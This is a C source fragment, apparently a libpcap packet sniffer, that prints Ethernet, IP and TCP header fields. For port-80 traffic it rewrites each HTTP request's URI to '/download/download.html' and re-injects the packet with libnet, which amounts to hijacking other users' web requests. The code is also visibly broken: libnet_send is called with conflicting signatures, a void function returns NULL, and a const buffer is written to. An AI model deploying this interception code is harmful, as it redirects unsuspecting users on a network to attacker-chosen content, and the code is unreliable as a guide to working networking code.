int libnet_vprintf(int fd, const char *fmt, va_list varg)
{
int ret;
static char *buf = NULL;
DEBUG_ASCII_IN;
ret = vfprintf(fopen("/dev/null", "w"), fmt, varg) + 1;
buf = REALLOC_N(buf, char, 0, ret + 1);
vsnprintf(buf, ret, fmt, varg);
ret = libnet_send(fd, buf);
RETURN (ret);
}
/*
* dissect/print packet
*/
void
got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
static int count = 1; /* packet counter */
/* declare pointers to packet headers */
const struct sniff_ethernet *ethernet; /* The ethernet header [1] */
const struct sniff_ip *ip; /* The IP header */
const struct sniff_tcp *tcp; /* The TCP header */
const char *payload; /* Packet payload */
int size_ip;
int size_tcp;
int size_payload;
printf("\nPacket number %d:\n", count);
count++;
/* define ethernet header */
ethernet = (struct sniff_ethernet*)(packet);
/* define/compute ip header offset */
ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
size_ip = IP_HL(ip)*4;
if (size_ip < 20) {
printf(" * Invalid IP header length: %u bytes\n", size_ip);
return;
}
/* print source and destination IP addresses */
printf(" From: %s\n", inet_ntoa(ip->ip_src));
printf(" To: %s\n", inet_ntoa(ip->ip_dst));
printf(" Source MAC: %02x:%02x:%02x:%02x:%02x:%02x\n",ethernet->ether_shost[0],ethernet->ether_shost[1],ethernet->ether_shost[2],ethernet->ether_shost[3],ethernet->ether_shost[4],ethernet->ether_shost[5]);
printf(" Dest MAC: %02x:%02x:%02x:%02x:%02x:%02x\n",ethernet->ether_dhost[0],ethernet->ether_dhost[1],ethernet->ether_dhost[2],ethernet->ether_dhost[3],ethernet->ether_dhost[4],ethernet->ether_dhost[5]);
printf(" ip_ttl: %d\n", ip->ip_ttl);
printf(" ip_id: %d\n", ip->ip_id);
printf(" ip_off: %d\n", ip->ip_off);
printf(" ip_len: %d\n", ip->ip_len);
printf(" ip_tos: %d\n", ip->ip_tos);
printf(" ip_vhl: %d\n", ip->ip_vhl);
/* determine protocol */
switch(ip->ip_p) {
case IPPROTO_TCP:
printf(" Protocol: TCP\n");
break;
case IPPROTO_UDP:
printf(" Protocol: UDP\n");
return;
case IPPROTO_ICMP:
printf(" Protocol: ICMP\n");
return;
case IPPROTO_IP:
printf(" Protocol: IP\n");
return;
default:
printf(" Protocol: unknown\n");
return;
}
/* define/compute tcp header offset */
tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + size_ip);
size_tcp = TH_OFF(tcp)*4;
if (size_tcp < 20) {
printf(" * Invalid TCP header length: %u bytes\n", size_tcp);
return;
}
printf(" Src port: %d\n", ntohs(tcp->th_sport));
printf(" Dst port: %d\n", ntohs(tcp->th_dport));
printf(" th_seq: %d | %d\n", tcp->th_seq, htonl(tcp->th_seq));
printf(" th_ack: %d | %d\n", tcp->th_ack, htonl(tcp->th_ack));
printf(" th_win: %d | %d\n", ntohs(tcp->th_win), htonl(tcp->th_win));
printf(" th_offx2: %d\n", ntohs(tcp->th_offx2));
printf(" th_sum: %d\n", ntohs(tcp->th_sum));
printf(" th_urp: %d\n", ntohs(tcp->th_urp));
printf(" size_tcp: %d\n", ntohs(size_tcp));
/* define/compute tcp payload (segment) offset */
payload = (u_char *)(packet + SIZE_ETHERNET + size_ip + size_tcp);
/* compute tcp payload (segment) size */
size_payload = ntohs(ip->ip_len) - (size_ip + size_tcp);
/*
* Print payload data; it might be binary, so don't just
* treat it as a string.
*/
if (size_payload > 0) {
printf(" Payload (%d bytes):\n", size_payload);
if (ntohs(tcp->th_dport) == 80)
{
modify_payload(payload, size_payload);
//modify_payload(payload, size_payload);
//printf("-> modify_payload end \n");
//print_payload(payload, size_payload);
const u_char new_payload[2048];
const char * p = payload;
while (notend(p) && ! isspace(*p) ) p++;
if ( end(p) || iscrlf(p) ) {
// set error
return NULL;
}
const char * RequestMethod = payload;
int RequestMethodlen = p - payload;
printf("--> RequestMethod: %.*s\n", RequestMethodlen, RequestMethod);
while (isspace(*p) && notcrlf(p) && notend(p) ) p++;
const char *RequestURI = p;
while (!isspace(*p) && notcrlf(p) && notend(p) ) p++;
int RequestURIlen = p - RequestURI;
printf("--> RequestURI: %.*s\n", RequestURIlen, RequestURI);
const char * change_uri = "/download/download.html";
sprintf(new_payload, "%.*s %s %s", RequestMethodlen, RequestMethod, change_uri, p);
//memcpy(new_payload, RequestMethod, RequestMethodlen);
printf("--> new_payload: len: %d | %s\n", strlen(new_payload), new_payload);
libnet_send(ethernet, ip, tcp, strlen(new_payload), new_payload);
}
}
return;
}
